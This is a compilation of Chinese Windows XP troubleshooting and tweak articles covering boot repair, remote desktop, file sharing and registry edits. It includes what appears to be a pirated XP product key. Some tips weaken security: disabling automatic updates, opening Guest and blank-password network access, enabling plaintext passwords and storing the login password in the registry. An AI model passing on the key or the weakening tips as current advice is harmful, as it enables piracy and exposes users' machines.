  解决：使用一张含有SYS.COM的Win9X启动盘启动电脑，执行SYS C:命令，然后重新启动，会发现无法启动Windows XP，这不要紧，这是正常的现象。然后再次重新启动，使用Windows XP安装光盘启动，进入故障恢复控制台，执行fixboot即可。如果你不会使用故障恢复控制台，那么还有一个方法：在Win9X里面执行Windows XP安装，系统拷贝完文件以后会重新启动，启动的是后手已经要快速按下方向键的上或下箭头，然后选择Windows回到Win9X下，接着编辑Boot.ini文件，确认你的Boot.ini文件和你电脑上Windows XP的启动相匹配，最后删除C盘根目录上以$开头的全部文件即可。

3、Boot.ini文件非法

   这个问题一般是由于boot.ini文件丢失或格式不正确造成的。boot.ini文件的格式一般是下面这种类型的：

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\Windows

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\Windows="Microsoft Windows XP Professional" /fastdetect

   具体的含义大家可以参看我的网站的这篇文章：《解读多重启动引导文件——BOOT.INI》(http://smallfrogs.nease.net/other/32.html)

4、找不到HAL.DLL文件，启动中止

   这个是由于C盘根目录下的boot.ini文件非法，导致默认从C:\Windows启动，但是又由于你的Windows XP没有安装在C盘，所以系统提示找不到HAL.DLL文件。启动因而失败。解决方法是重新编辑Boot.ini文件。我们有很多方法编辑这个文件，下面我挑选几种便于操作的介绍给大家：

   1)、使用Win9X启动盘启动，使用EDIT.EXE命令编辑这个文件。启动EDIT.EXE以后只要按照正确的格式输入Boot.ini文件的内容，保存为Boot.ini文件即可。

   2)、使用COPY CON命令创建一个Boot.ini文件。在DOS下输入Copy Con C:\boot.ini以后回车。然后按照Boot.ini文件的格式输入，每输入一行敲一次回车键，当全部内容输入完毕以后，按CTRL+Z，屏幕上会看到^Z的提示。这个时候再敲一次回车，系统会提示1 file(s) copied.这就表示创建成功了。

   3)、使用故障恢复控制台里面的bootcfg命令。具体的使用方法请大家查看Q330184一文。我在这里就不介绍了。

   4)、在别的电脑上创建好以后，拷贝到受损电脑的C盘根目录上覆盖源文件即可。

5、安装的简体中文版的Windows XP在启动选单的时候不是英文提示

   一般是由于C:\bootfont.bin丢失造成的，但是如果你安装了更高版本的英文版本的Windows，那么这个现象就是很正常的。如果没有的话，从Windows XP安装光盘里面提取bootfont.bin到C盘根目录即可。

6、安装 Windows 2000 后无法启动 Windows XP

   症状：安装 Windows 2000 后试图启动 Windows XP 时，您可能会收到下面的错误消息：

"Starting Windows...

Windows 2000 could not start because the following file is missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SYSTEMd startup options for Windows 2000, press F8.

You can attempt to repair this file by starting Windows 2000 Setup using the original Setup floppy disk or CD-ROM.

Select 'r' at the first screen to start repair."

   原因：出现此问题的原因是，在 Windows 2000 发行时 Windows XP 尚不存在。Windows 2000引导程序不知道已在 Windows XP 中做了改动。计算机需要知道这些改动才能加载 Windows XP。

   解决：若要解决此问题，请用 Windows 2000 启动计算机，然后将 Windows XP 光盘上 I386 文件夹中的 NTLDR 和 Ntdetect.com 文件复制到系统驱动器的根目录中。


打开3389服务

《一键清理系统垃圾》

打开3389服务

在 我的电脑→右键→管理→服务和应用程序→服务
找到Terminal Services服务，启动它属性改为自动启动！
然后重新启动！

XP序列号

CCC64-69Q48-Y3KWW-8V9GV-TVKRM


当心Win XP的“自动更新”

《一键清理系统垃圾》

当心Win XP的“自动更新”

    近期单位一些安装了Windows XP的电脑在登录时，系统提示“此媒体类型的产品号无效。请用正确的安装CD重新安装你的系统，错误代码：0x80040509”。无论用户使用什么用户名(包括Administrator)都无法正常进入桌面。用Windows XP安装光盘修复所需时间比较长，且个别电脑的C盘内容保不住。好在使用“安全模式”可以进入，经过研究，最终在“安全模式”下修复了这个错误。具体方法如下：

    第1步:在电脑启动时，按F8键，调出启动菜单，选择“安全模式”进入。或直接按F5键用“安全模式”启动Windows XP；

    第2步:打开“控制面板→添加/删除程序”，在“当前安装程序”列表中对最上面的“Windows XP hotfix……”执行“删除”操作后，重新启动计算机。

    第3步:如果还不能正常启动，请再次进入安全模式，将“当前安装程序”列表中所有的“Windows XP hotfix……”都删除，重新启动计算机即可。

    第4步:为了彻底防止此类问题的发生，不妨禁用Windows XP的“自动更新”功能。右击“我的电脑”，单击“属性”打开“系统属性”对话框，单击对话框中的“自动更新”标签，将其中的“关闭自动更新……”选项选中，“确认”退出。


防范Windows XP的安全策略

《一键清理系统垃圾》

防范Windows XP的安全策略

·2002-01-14　　　　　 作者：

    尽管Windows XP刚刚推出没有多长时间，但是Windows XP凭借其超强的稳定性和可靠的安全性还是吸引了不少用户在第一时间内去使用它。笔者在与Windows XP的短暂“接触”中，细心留意了一些安全方面的操作策略，现在把它整理成文，以期抛砖引玉。

    1、屏蔽不需要的服务组件

    尽管服务组件安装得越多，用户可以享受的服务功能也就越多。但是用户平时使用到的服务组件毕竟还是有限，而那些很少用到的组件不但占用了不少系统资源，会引起系统不稳定外，它还会为黑客的远程入侵提供了多种途径，为此我们应该尽量把那些暂不需要的服务组件屏蔽掉。具体的操作方法为：首先在控制面板中找到"服务和应用程序"图标，然后再打开"服务"对话框，在该对话框中选中需要屏蔽的程序，并单击鼠标右键，从弹出的快捷菜单中依次选择"属性"/ "停止"命令，同时将"启动类型"设置为"手动"或"已禁用"，这样就可以对指定的服务组件进行屏蔽了。

    2、起用电源保护功能
    使用电脑处理文件时，最担心的就是计算机突然掉电，因为这种突然掉电不但会使自己的辛勤劳动成果顷刻间化为乌有，严重的话还能使计算机受到损伤。为了防止各种情况下的意外掉电，保证计算机的安全正常工作，我们应该在电源管理中启用按下电源按钮时询问或直接休眠的功能。如果您要启动电源保护功能的话，可以用鼠标在Windows XP的桌面上依次单击“我的电脑”/“控制面板”/“电源选项”，在弹出的设置框中选择“高级”标签，在对应的标签页面下找到“按下计算机电源按钮时”设置项，然后在设置框中选择“休眠”或者“问我要做什么”选项，如果选择“关机”选项的话，就相当于没有起用电源保护功能。

    3、对重要信息进行加密

    为防止其他人在使用自己的电脑时，偷看自己存储在电脑中的文件信息，Windows XP特意为我们普通用户提供了“文件和文件夹加密”功能，利用该功能我们可以对存储在电脑中的重要信息进行加密，这样其他用户在没有密码的情况下是无法访问文件或者文件夹中的内容的。在对文件进行加密时，我们首先打开Windows XP的资源管理器，然后在资源管理器操作窗口中找到需要进行加密的文件或者文件夹，然后用鼠标右键单击选中的文件或文件夹，从弹出的快捷菜单中选择“属性”命令，随后Windows XP会弹出文件加密对话框，单击对话框中的“常规”标签，然后再依次选择“高级”/“加密内容以便保护数据”就可以了。

    4、锁定您的计算机

    如果在使用电脑的过程中因有急事需要短暂离开电脑的话，许多人因担心自己的电脑会被别人占用，往往会采取先关机，后离开，然后回来再开机的办法来处理，但这样频繁开关机器对电脑是不利的。那我们有没有办法做到既不要关机又能防止其他人使用自己的计算机呢？办法当然是有的啦，您可以通过双击桌面快捷方式来迅速锁定键盘和显示器，而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。在锁定您的计算机时，您可以参照如下的步骤来执行：先用鼠标右键单击Windows XP的桌面，然后在右键菜单中依次选择"新建"/"快捷方式"，随后按照屏幕提示，在命令行的文本框中输入"rundll32.exe user32.dll,LockWorkStation"命令字符，再在随后的向导窗口中输入对应该快捷方式的具体名称，在这里为方便以后调用，您可以直接为该快捷方式取名为"锁定计算机"就可以了。以后您只要双击桌面上的“锁定计算机”，就可以达到锁定的目的了。

5、使用“连接防火墙”功能

    在网络时代中，病毒的传播方式、传播速度和破坏力发生了翻天覆地变化，而且黑客行为也正在全世界范围内活动。为了防止病毒和黑客的随意入侵，不少用户在自己的计算机中都安装了防火墙。而Windows XP就加入了免费的"Internet 连接防火墙"功能，利用该功能，Windows XP能对出入系统的所有信息进行动态数据包筛选，允许系统同意访问的人与数据进入自己的内部网络，同时将不允许的用户与数据拒之门外，最大限度地阻止网络中的黑客来访问自己的网络，防止他们随意更改、移动甚至删除网络上的重要信息。在使用“连接防火墙”功能时，您可以依次单击开始菜单中的"设置"/"网络连接"菜单项，然后从弹出的窗口中选择需要上网的拨号连接，然后用鼠标右键单击该连接图标，并选择"属性"命令，在随后弹出的拨号属性窗口中再单击"高级"标签，在对应标签的页面中选中"Internet连接防火墙"选项，然后再单击对应防火墙的“设置”按钮，来根据自己的要求设置一下防火墙，以便防火墙能更高效地工作。

    6、随时起用屏保程序

    看到“屏保”二字，大家肯定会很自然地想到计算机中的屏幕保护程序，它主要是通过采用不同方式轮流显示指定图片来达到屏幕保护的目的。但是只有当不操作电脑达到事先设置的时间后，系统才会启动屏幕保护程序，如果我们想在任意指定的时间内启动屏幕保护程序，该怎么办呢？我们可以按照下面的操作方法来实现：在Windows XP的开始菜单中，依次单击"开始"/"搜索"/"文件或文件夹"，然后在弹出的搜索对话框中，点击"所有文件和文件夹"类型，并在对应文件名的文本框中输入"*.scr"字符，再在搜索范围下拉列表中，选择"本机磁盘(C:)"或计算机上存储系统文件的驱动器，最后单击"搜索"按钮。然后在找到的屏幕保护程序列表中，选择需要的屏保程序，然后给这个屏保程序建立一个存放在桌面上的快捷方式，以后要启动屏保程序时直接用鼠标双击桌面上的屏保快捷方式。

    7、为自己分配管理权限

    安装在Windows XP操作系统中的许多程序，都要求用户具有一定的管理权限才能让用户使用程序，因此为了能够使用好程序，我们有时需要为自己临时分配一个访问程序的管理权限。在分配管理权限时，我们可以先普通用户身份登录到Windows XP的系统中，然后用鼠标右键单击程序安装文件，同时按住键盘上的Shift键，从随后出现的快捷菜单中点击"运行方式"，最后在弹出的窗口中输入具有相应管理权限的用户名和密码就可以了。

    8、消除系统假死现象

    在操作Windows XP中的应用程序时，由于操作不当或者系统本身的问题，导致了操作的程序很长时间没有响应，许多人以为计算机肯定是死机了，于是不少人选择了直接关机或者使用Ctrl+Alt+Delete来重新启动计算机。其实在Windows XP中，有些不能正常运行的程序会引起系统任务栏的假死，这种现象主要是由于当前执行的程序与系统无法兼容引起的。遇到这种现象时，我们可以找到该程序的执行文件，然后单击鼠标右键，在弹出的对话框中选择"兼容性"标签，再在"兼容模式"下选择相应需要的运行环境。


感受Windows XP的远程桌面连接

《一键清理系统垃圾》

感受Windows XP的远程桌面连接

用Windows XP的最大感受就是它漂亮的界面和更加简单化的操作。而对这个远程桌面连接的使
用，让我更加感受到Windows XP的魅力所在。以前记得看到过这方面的设想：员工晚上下班回
到家里，回到家里，打开电脑，然后连接到自己在公司的电脑上，察看文档，收集信息。而这
时，只见公司里的那台电脑只是主机亮着显示灯，显示器一片漆黑。现在，已经不是设想了，
通过Winodws XP的远程访问功能可以轻松实现。现在看一下具体的实现步骤。
    首先是设置访问端
    在"我的电脑"图标上，单击右键，选择属性，在弹出的窗口中选择"远程"选项，如下图所
示：
选择"允许用户远程连接到这台计算机"，点击"选择远程用户"按钮，在弹出的窗体中你需要设
置用于远程访问这台计算机的帐号。记住，为了安全，这些帐号要有复杂的密码。另外，如果
不选择用户，默认情况下，管理员帐号组的成员有远程访问这台计算机的权利。设置好帐户后
，点击确定按钮，这样被访问端就设置好了，其实这个功能是默认启用的，你只需添加你想用
于远程访问计算机的帐号即可，如果不添加，用系统管理员的帐号也可以进行远程连接访问。
怎么样，是不是感觉Windows XP用起来很方便，容易!
访问端的使用
    点击开始菜单，所有程序，附件，通讯，远程桌面连接。弹出窗体如下：
点击选项按钮显示更多的设置信息如下图：
在"计算机"中，键入计算机名或 IP 地址，该计算机可以是终端服务器，或者是启用了"远程
桌面"的Windows XP计算机。键入用户名和密码，同时你还可把当前的连接设置保存为文件。
接着再让我们看看，其它的选项卡：
这里根据你的网络连接速度，选择适合的色彩，当然，如果你用的是宽带，或是在局域网里，
就不用改什么了。
  看到上面的设置项了吗，在此无需多言了
最后这个选项卡，用于选择网络连接，优化性能。我试着在10M局域网里用了一下，感觉很好
，令人心动。点击"连接"，稍等片刻就连到了远程计算机上，这时被远程访问的计算机自动切
换到登录界面，同时保持着当前帐号的信息和程序。在访问端的计算机上，默认全屏显示，除
了屏幕上边有个水平的细长条，其它和原来在被访问端看到的完全一样。试着打开"我的电脑
"-->"开始菜单"，然后开几个应用、编辑处理程序，在界面以及程序处理上根本感觉不到在用
远程计算机。有时，当你未用远程计算机时，远程计算机便开始屏幕保护，如要使用就会要求
你输入用户名、密码，登录进入后，可能会发现远程连接自动断开，这时会弹出窗口，提示远
程计算机已由另外的管理者接管。依照上面的步骤，同样可返回到将才的状态，程序依旧打开
，正常运行。可以想象，如果加上一块有远程唤醒的网卡或是MODEM，该功能将更加好用


搞定Windows XP鲜为人知的漏洞

《一键清理系统垃圾》

搞定Windows XP鲜为人知的漏洞

2002-03-09　　　 飞翔技术支持中心

1）热键

热键是用来启动一个程序或者使用一个程序的某项功能的一个键和一组键，一个键的可以包括F1，F2这些功能键，也可以是一些特制的键，比如DELL键盘上的“internet”，“mail”等一般键盘上没有的键，最常见的主要是一些组合键，使用QQ的人最熟悉的热键是“ctrl＋~”组合键，用来打开快捷地查看发来的信息。还有许多热键可以用来打开程序，这些热键一般自己可以设置，设置后可以用来打开各种程序，你可以为每个程序的设置确定规则，这样就可以有效地利用热键地功能，比如按照程序的首字母来命名，这样经过设置后，你就可以方便地用“ctrl＋Alt＋N”打开记事本，用“ctrl＋Alt＋W”打开word，对于那些对某个工具特别依赖的人来说，这样的打开程序的方式是很方便的，因此被广泛使用。

2）winxp的“自注销”功能

在办公的时候，我们常常需要暂时离开一下，而把电脑晾在办公桌上，这样就意味着信息被窥或丢失甚至更严重的后果，所以有了屏幕保护程序，如果你设了密码，那么一般情况下，别人就动不了你的电脑。这样就保证了安全。

在winxp中，它提供一种我们称之为“自注销”（即自动注销）的功能，这种功能与屏幕保护程序有着异曲同工之妙，在你的电脑有一段时间出于静止状态后它就自动注销，不过这种“注销”是一种假注销，你所有的后台程序都还在运行，跟没有注销前几乎没有什么差别，这就留下了隐患。

漏洞描述

热键功能是系统提供的一个服务（专指打开程序，使用程序的热键），在启动过程一直到登陆界面，这个服务一直没有执行，当你以某一用户的身份登陆时，这个功能方才启动，执行之后，用户就可以使用用户自己设置（包括一些默认的热键）的热键了。

假设一用户（他有管理员的身分，并以管理员登陆）有事离开一段时间，本来以为马上就回来，但后来被事情逼得不能马上就回来了，他得的电脑就暴露在没有保护的情况下了，这时winxp（这里提到的电脑的操作系统都专指winxp，而且该操作系统并没有设置屏幕保护程序和相应的密码）就非常聪明地自动实施了“自注销”。如果这种注销是真的注销了，那么这种安全措施显然是非常好的，但正如前面所讲，这种注销是假的，虽然其他人已经进不了你的桌面，看不到你的电脑里放了些什么，但他们还可以使用热键，因为热键服务还没有停止。

这时一个有敌意的并且经验丰富的人就可以利用这些热键干一些事，最简单比如打开N个大程序，来破坏你的机器，可以打开并使用某个程序，特别是一些与网络有关的敏感程序（和服务）……

实际上这台电脑被他控制了一半，只要他有足够的想象力……

安全对策

其实，我们得承认上面这个漏洞要被利用真正做出有破坏性的事情来几率是十分小的，它成立需要许许多多的“假设”，但作为一个漏洞，它却是实实在在存在的，不怕一万，只怕万一，就象“CDautorun”，据我们所知，它还没有被真正用来搞过破坏，但是这种破坏安全的可能性是实实在在存在的，所以在许多公共场合（比如网吧），这项功能是关闭的。

那么怎么对付这个漏洞哪？

1、等微软给补丁，使实施“自注销”时，热键服务也一起停止。
    2、检查并观点可能会带来危害的程序和服务的热键。这个漏洞被利用的前提是热键可用。
    3、打开屏幕保护程序，并设置密码。

winxp推出后确实做了许多为用户着想的功能，但每一项新的功能都可能由于各种原因潜藏了一种可能的危害。

建议：请在离开计算机的时候按下windows键＋L键，锁定您的计算机。


给XP共享文件夹加上密码锁

《一键清理系统垃圾》

给XP共享文件夹加上密码锁

    单位其他部门的同事向我提出一个问题：他电脑（操作系统Windows XP Profession）里的一些资料希望给另一个部门的一个用户，而且只让这个用户共享这些资源，但是他将目录共享后，单位局域网中的所有电脑都能看到这些资料，他立刻取消了共享。有没有什么办法让Windows XP和Windows 9x/Me一样，可以为共享文件夹加上密码，让只有得到授权知道密码的用户才可以共享这些资源呢？

    我到他电脑前一看，发现Windows XP网络共享变了，简单是真的简单，但不安全，只能将共享文件夹设置为只读或是“允许网络用户修改我的文件”，这样任何电脑设置的共享资源，所有与该电脑同网的电脑通过“网上邻居”不用任何授权都可以共享到这台电脑的共享资源。经过一番摸索，发现Windows XP安装时缺省的共享是“简单共享”，从而导致“敞开”的、不安全的文件共享。改变这种“简单共享”的方法是：

    先取消默认的“简单共享”。打开“我的电脑”，依次点击“工具→文件夹选项”，在打开的对话框中选择“查看”选项卡，清空“使用简单共享(推荐)”前的复选框。

    然后创建共享用户。单击“开始→设置→控制面板”，打开“用户帐户”，创建一个有密码的用户，假设用户名为user00，需要共享资源的机器必须以该用户共享资源。

    接下来设置要共享的目录(假设为共享目录为NTFS分区上的目录test1)，并设置只有用户user00可以共享该目录下的资源：用鼠标右键单击要共享的目录“test1”，单击“共享和安全”，选择“共享→共享该文件夹”，点击“权限”，单击“删除”按钮将原先该目录任何用户(everyone)都可以共享的权限删除，再单击“添加”按钮，依次单击“高级→立即查找”，选择用户user00，单击“确定”添加用户user00添加，并选择用户user00的共享权限（如图）。

    以后局域网中的计算机要想查看该共享文件夹中的内容，只有输入正确的用户名和密码，才能查看或修改共享文件夹中的内容。


关闭WinXP的错误报告

《一键清理系统垃圾》

关闭WinXP的错误报告

    右键单击“我的电脑”，打开“系统属性”窗口，选择“高级”标签，单击“错误报告”，选择“禁用错误报告”，以后Windows就不会询问你是否要发送报告了，只会告诉你程序出错需要关闭。


活用XP安全模式

《一键清理系统垃圾》

活用XP安全模式

2002-02-25　　　　作者：

    一、尝试到安全模式下检测不兼容的硬件

    XP由于采用了数字签名式的驱动程序模式，对各种硬件的检测也比以往严格，所以一些设备可能在正常状态下不能驱动使用。例如一些早期的CABLE MODEM，如果你发现在正常模式下XP不能识别硬件，可以在启动的时候按F8，然后选进入安全模式，在安全模式里检测新硬件，就有可能正确地为CABLE MODEM加载驱动了。

    二、卸载不正确的驱动程序

    一般的驱动程序，如果不适用你的硬件，可以通过XP的驱动还原来卸载。但是显卡和硬盘IDE驱动，如果装错了，有可能一进入GUI界面就死机；一些主板的ULTRA DMA补丁也是如此，因为Windows是要随时读取内存与磁盘页面文件调整计算机状态的，所以硬盘驱动一有问题马上系统就崩溃。此时怎么办呢？

    我们可以进入XP的安全模式，安全模式中，Windows 使用默认设置（VGA 监视器、Microsoft 鼠标驱动程序、无网络连接、启动 Windows 所需的最少设备驱动程序），而且安全模式用最少的服务启动，这样错误的IDE和显卡驱动就不加载，你就可以删除引起问题的软件或硬件了，并用驱动还原来恢复系统了。在Windows9X里就没那么方便，所以XP虽然对硬件要求高了点，还是值得一用的。

    三、以安全模式修复致使连接状态中断的问题

    某些情况下，禁用管理员帐户可能造成维护上的困难。例如，在域环境中，当用于建立连接的安全信道由于某种原因失败时，如果没有其他的本地管理员帐户，则必须以安全模式重新启动计算机来修复致使连接状态中断的问题。

    如果试图重新启用已禁用的管理员帐户，但当前的管理员密码不符合密码要求，则无法重新启用该帐户。这种情况下，该管理员组的可选成员必须通过“本地用户和组”用户界面来设置该管理员帐户的密码。


加快WinXP窗口显示速度

《一键清理系统垃圾》

加快WinXP窗口显示速度

    我们可以通过修改注册表来改变窗口从任务栏弹出，以及最小化回归任务栏的动作，步骤如下：打开注册表编辑器，找到HKEY_ CURRENT_USER\Control Panel\Desktop\ WindowMetrics子键分支，在右边的窗口中找到MinAnimate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。


教你玩转注册表:XP六条未公开秘技放送

《一键清理系统垃圾》

教你玩转注册表:XP六条未公开秘技放送

支持137 GB以上大硬盘

   想要使用137 GB以上大硬盘，必须使用48位LBA模式。首先你的主板BIOS必须支持48Bit LBA，其次WinXP 家用版和专业版必须安装SP1补丁。然后打开注册表，在如下路径“HKEY_LOCAL_MACHINE System CurrentControlSet Services Atapi Parameter”找到“EnableBigLba”选项，将其值由“0”改为“1”。如果该项不存在，可以自建“DWORD值”项目，同样设置.最后重新启动即可.

删除共享文档

   如果你不需要共享文件，可以这样移除它：进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My computer Namespace DelegateFolders，删除键值“”。

锁定桌面

   想要锁定桌面不被别人肆意修改，可以使用很多工具例如TweakUI，不过其实在注册表里进行小小的改动即可实现：进入HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies Explorer，建立DWORD值“NoDesktop”，将其值修改为“1”即可。

停用“上次访问时间标记（Last Access Time Stamp）”

   不想要这项功能，可以这样修改：进入HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control File system，新建DWORD值“NtfsDisableLastAccessUpdate”，将其值修改为“1”即可。

设置“远程访问连接服务器（RAS）”

   需要的话可以这样修改：进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Winlogon，新建字符串值“KeepRasConnections”，将其值修改为“1”即可。

使用明文密码（Lain Text Password）

   访问UNIX或者LINUX服务器的时候，有时需要明文密码这在XP下很容易实现：找到“HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services lanmanworkstation parameter enableplaintextpassword”并将其值设置为“1”即可.


解除Windows XP的文件共享限制

《一键清理系统垃圾》

解除Windows XP的文件共享限制

    笔者的很多朋友都曾遇到过这样的问题：在安装了Windows XP的计算机上，即使网络连接和共享设置正确（如IP地址属于同一子网，启用了TCP/IP上的NetBIOS，防火墙软件没有禁止文件共享需要的135、137、138、139等端口），使用其他系统（包括Windows 9X/Me/2000/XP等）的用户仍然无法访问该计算机。我们应该怎样解决这一问题呢?
    默认情况下，Windows XP的本地安全设置要求进行网络访问的用户全部采用来宾方式。同时，在Windows XP安全策略的用户权利指派中又禁止Guest用户通过网络访问系统。这样两条相互矛盾的安全策略导致了网内其他用户无法通过网络访问使用Windows XP的计算机。你可采用以下方法解决。
    方法一 解除对Guest账号的限制
    点击“开始→运行”，在“运行”对话框中输入“GPEDIT.MSC”，打开组策略编辑器，依次选择“计算机配置→Windows设置→安全设置→本地策略→用户权利指派”，双击“拒绝从网络访问这台计算机”策略（见图），删除里面的“GUEST”账号。这样其他用户就能够用Guest账号通过网络访问使用Windows XP系统的计算机了。
    方法二 更改网络访问模式
    打开组策略编辑器，依次选择“计算机配置→Windows设置→安全设置→本地策略→安全选项”，双击“网络访问：本地账号的共享和安全模式”策略，将默认设置“仅来宾—本地用户以来宾身份验证”，更改为“经典：本地用户以自己的身份验证”。
    现在，当其他用户通过网络访问使用Windows XP的计算机时，就可以用自己的“身份”进行登录了（前提是Windows XP中已有这个账号并且口令是正确的）。
    当该策略改变后，文件的共享方式也有所变化，在启用“经典：本地用户以自己的身份验证”方式后，我们可以对同时访问共享文件的用户数量进行限制，并能针对不同用户设置不同的访问权限。
    不过我们可能还会遇到另外一个问题，当用户的口令为空时，访问还是会被拒绝。原来在“安全选项”中有一个“账户：使用空白密码的本地账户只允许进行控制台登录”策略默认是启用的，根据Windows XP安全策略中拒绝优先的原则，密码为空的用户通过网络访问使用Windows XP的计算机时便会被禁止。我们只要将这个策略停用即可解决问题。


解决Win 98不能访问Win XP的问题

《一键清理系统垃圾》

解决Win 98不能访问Win XP的问题

    98不能访问XP或2000的情况相信很多人都遇到过，可是遇到了我们能不能解决呢？很多人没有办法今天小编来说一法，看看行不行哟！

    在局域网内，经常可以遇到装有Win2000的电脑开了共享目录，而装有Win98的电脑无法访问Win2000的共享目录，在微软的官方网页可以找到答案，提示开启Win2000的GUEST用户就行了。

    可是XP出来以后，同样的又面临这个问题，结果有些人发现这个方法不灵了。从网上邻居访问XP的共享目录不一定能被允许。原因何在？这个问题本也困扰过我几天，不过后来一次无意中发现了问题的答案，也许这是XP的一个BUG？希望能对大家有所帮助。

    在开启了系统Guest用户的情况下，点击“开始”-》“运行”，输入gpedit.msc，可以调出组策略编辑器，在“本地计算机策略\计算机配置\Windows设置\安全设置\本地策略\用户权利指派\拒绝从网络访问这台计算机”中赫然可以看到有Guest用户！如果在这里删除Guest用户，那么其他电脑就可以从网上邻居中查看这台电脑的共享目录了。

    (环境：中文WinXP，采用传统登录方式并且关闭了“文件夹选项”中的“使用简单文件共享”。)


解决Windows XP不能自动登录

《一键清理系统垃圾》

解决Windows XP不能自动登录

    每次进入Windows XP桌面前，总会出现一个用户登录的画面，要求输入用户名和密码。这样做的好处是在多人使用一部电脑的环境中安全性有保障。不过，如果电脑只是你一个人使用，每次都必须输入密码，实在是令人讨厌。要取消这个登录步骤，可以通过修改注册表文件中的Winlogon项目来实现。但在修改之前有必要提醒大家，这样做的后果是你的密码会以纯文本的形式存放于注册表文件中。换句话说，只要有人能够打开你的注册表文件，那他就会知道你的登录密码。了解这些情况后，如果仍想改动的话，可按以下步骤操作：

     第1步 运行注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ]分支，然后在右侧窗口双击“DefaultUserName”，接着输入你的登录用户名。如果没有预设的用户名称，可以在注册表编辑器的菜单栏点选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目，注意要区分大小写字母。

     第2步 同样在该分支下，在注册表编辑器的右侧窗口中双击“DefaultPassword”，然后在空白栏内输入你的密码。假如未发现“DefaultPassword”一项，可按上面的步骤来新建该字符串值。

     第3步 接下来在右侧窗口中双击“AutoAdminLogon”，将数值设置为“1”。假如未发现“AutoAdminLogon”，可按上面的步骤来新建。

    现在关闭注册表编辑器并重新启动电脑，以后你会发现那个令人讨厌的登录已经不见了。


五招解决WinXP启动后操作迟延的问题

《一键清理系统垃圾》

五招解决WinXP启动后操作迟延的问题

症状：启动刚进入系统界面时，点什么都打不开，要等一分钟左右才能打开

症状：启动刚进入系统界面时，点什么都打不开，要等一分钟左右才能打开。
    解决办法：
    一、首先，请升级杀毒软件的病毒库，全面杀毒，以排除病毒原因。什么？你没安杀毒软件!？——除非你是老鸟(此文大虾和老鸟跳过^_^)，否则建议安装。What?盗版的，不能升级!？这个问题别问偶，自己想办法!

    二、开始→运行，输入msconfig→确定。在打开的系统系统配置程序里，将一些不重要的服务以及启动程序关闭，重启电脑。

    三、进入“我的电脑”——工具——文件夹选项——查看——取消“自动搜索网络文件夹和打印机”的勾选。

    四、在Windows XP启动进入桌面后系统会暂时停滞一段时间，这时启动任何程序都会没有反应，这是因为Windows XP的DHCP Client服务正在为网卡分配IP地址，系统会暂时停滞一段时间。解决这个问题，只要在“控制面板→网络连接”里，用鼠标右键单击“本地连接”图标，然后选择属性，在弹出的属性窗口(如图)的“常规”选项卡的列表里选择“Internet协议(TCP/IP)”一项，然后单击“属性”按钮。在弹出的属性窗口中，选择“使用下面的IP地址”选项，并在“IP地址”和“子网掩码”中分别输入“192.168.0.1”和“255.255.255.0”，最后单击OK退出设置窗口。

    开始→设置→网络连接→右击“本地连接”→属性→双击“Internet 协议 (TCP/IP)”→如果IP地址为空的话，点“使用下面的IP地址”指定IP地址和子网掩码。如可以将IP地址设为192.168.0.X(X为1-255之间任一值)，子网掩码可设为255.255.255.0→确定→确定。

    五、清除预取目录，进入C:\WINDOWS\Prefetch文件夹，将扩展名为pf的文件全部删除，重启


Win XP系统搜索故障以及处理办法点点通

《一键清理系统垃圾》

Win XP系统搜索故障以及处理办法点点通

    故障1：单击资源管理器工具栏上的“搜索”按钮或者按F3，系统无任何响应。

    解决方法：首先进入C:\Windows\inf文件夹(该文件夹属性为隐藏)，右键单击srchasst.inf文件，选择“安装”菜单，系统会提示你插入Windows XP安装光盘，该操作为重新安装Windows XP的搜索服务组件。对于在搜索中遇到的其它故障，大家也可以将该方法作为最后的救命稻草。

    故障2：系统提示“A file that is required to run Search Companion cannot be found. You may need to run setup”(找不到搜索组件)。

    解决方法：造成这个故障的原因是C:\Windows\srchasst\mui\0409下的BAR.XSL、BALLOON.XSL等文件损坏，我们可以首先尝试清空IE临时文件夹，如果问题还未得到解决请安装http://download.microsoft.com/download/whistler/Patch/Q319949/

     WXP/EN-US/Q319949_WXP_SP1_x86_ENU.exe(英文版Windows XP用户)，如果你尚未安装SP1，请安装。

    故障3：系统提示一个黄色带感叹号的三角形警告。

    解决方法：首先运行“Regedit”命令打开注册表编辑器，依次定位到“[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0 -5564-11d1-83f2-00a0c90dc849}]”分支，在右边窗口中找到“默认”，将其值修改为“Search Results Folder”。接下来定位到“[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Cabinet State]”，在窗口右边新建一个字符串键，其名为“Search Asst”，讲其值设置为“no”。

    故障4：“开始”菜单中的“搜索”菜单丢失。

    解决方法：运行“Regedit”命令打开注册表编辑器，定位到“[HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]，在窗口右边新建一个名为“NoFind”的dword值，将其值设置为00000000(十六进制)。


XP输入法状态条不见了

《一键清理系统垃圾》

XP输入法状态条不见了

打开注册表编辑器，找到“HKEY_USERS\.DEFAULT\Control Panel\Input Method”分支，将右边窗口中“Show Status”的键值修改成“1”(“1”为显示状态条，“0”为不显示状态条)，然后重新启动系统，输入法状态条就出来了。此方法对Win 98/2000都适用。
打开“我的电脑→控制面板→区域和语言选项”，在“语言”标签页下的“详细信息”中，点击“设置”标签页下的“语言栏设置”按钮，选择“在桌面显示语言栏”后点击“确定”即可。

我的电脑-控制面板-区域和语言选项-语言－详细信息－高级，把关闭高级文字服务前面的钩去掉。


Windows XP搜索功能失效

《一键清理系统垃圾》

Windows XP搜索功能失效

